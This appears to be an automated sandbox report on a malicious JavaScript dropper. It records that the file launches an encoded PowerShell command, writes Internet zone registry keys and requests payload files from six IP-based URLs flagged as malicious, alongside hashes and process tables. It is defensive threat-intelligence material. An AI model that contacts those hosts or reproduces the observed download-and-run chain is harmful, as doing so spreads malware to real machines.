Field | Value
---|---
File name | detailsG[zPA6].js
Full analysis | https://app.any.run/tasks/3963384e-1865-4d05-aa0c-85a6238cb776
Verdict | Malicious activity
Analysis date | March 31, 2023, 22:37:19
OS | Windows 10 Professional (build: 19044, 64 bit)
Indicators | 
MIME | text/plain
File info | ASCII text, with very long lines, with CRLF line terminators
MD5 | 3D21C75B29BAD8737C815E7362D250F9
SHA1 | 8F75881B5308322E4F5E40213AED19D75929A55E
SHA256 | F319D38F0F5F26FE99B777B4E3E514B52FD98282A996EAB6DAA8B3BA56C39123
SSDEEP | 3072:FwNFokQZ1Jf5ZD6qlBiu56tps1C8rBh/z9UtUhsnUUSNMy/cCUPIzHmEyRf77b+R:FwNFokQZ1Jf5ZD6qlBiu52ps1C8rBh/j
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
1648 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\detailsG[zPA6].js" | C:\Windows\System32\wscript.exe | — | explorer.exe
4088 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "<\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|>" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wscript.exe
5624 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe
1620 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | | svchost.exe

PID | Process | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---|---
1648 | wscript.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.812.10240.16384
4088 | powershell.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 10.0.19041.1 (WinBuild.160101.0800)
5624 | conhost.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800)
1620 | slui.exe | admin | Microsoft Corporation | MEDIUM | Windows Activation Client | 0 | 10.0.19041.1 (WinBuild.160101.0800)
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
1648 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
1648 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
1648 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
1648 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0
4088 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
4088 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
4088 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
4088 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
4088 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4gygwoaf.4eb.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4088 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_arvcfk0h.ver.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4088 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | 1ACADA3C580D8D7AB5D8C84B136C78F1 | 1D4C4668DC6191C5C0B132D76740E086EC867304A736C82CA26AC5B026295207
4088 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 8871A837C29C87B2A2523695F4D7B94C | 11C212FDF804BB37790C90C61CE8181D89CDF26044389A6EFA3355DAC541E152
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4088 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/c0ZKwR3aZZ.dat | US | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/8NvQe.dat | CY | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/R85SYE1VyT.dat | US | xml | 341 b | malicious |
3652 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 341 b | whitelisted |
4088 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/50jxG9q.dat | NL | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/a0mM0ngkd.dat | FR | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/fxOwualpD.dat | US | xml | 341 b | malicious |
1620 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 341 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4088 | powershell.exe | 104.225.129.114:80 | — | SHOCK-1 | US | malicious |
4088 | powershell.exe | 199.247.30.203:80 | — | AS-CHOOPA | NL | malicious |
5432 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4088 | powershell.exe | 216.146.25.129:80 | — | CLOUDIE-NETWORKS-LLC | US | malicious |
5064 | svchost.exe | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5952 | MoUsoCoreWorker.exe | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4088 | powershell.exe | 94.131.117.111:80 | — | ZAYO-6461 | US | malicious |
4088 | powershell.exe | 141.94.86.90:80 | — | OVH SAS | FR | malicious |
4088 | powershell.exe | 85.239.41.205:80 | — | Cloudlayer8 Limited | CY | malicious |
Domain | IP | Reputation
---|---|---
settings-win.data.microsoft.com | | whitelisted
activation-v2.sls.microsoft.com | | whitelisted
self.events.data.microsoft.com | | whitelisted
PID | Process | Class | Message |
---|---|---|---|
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |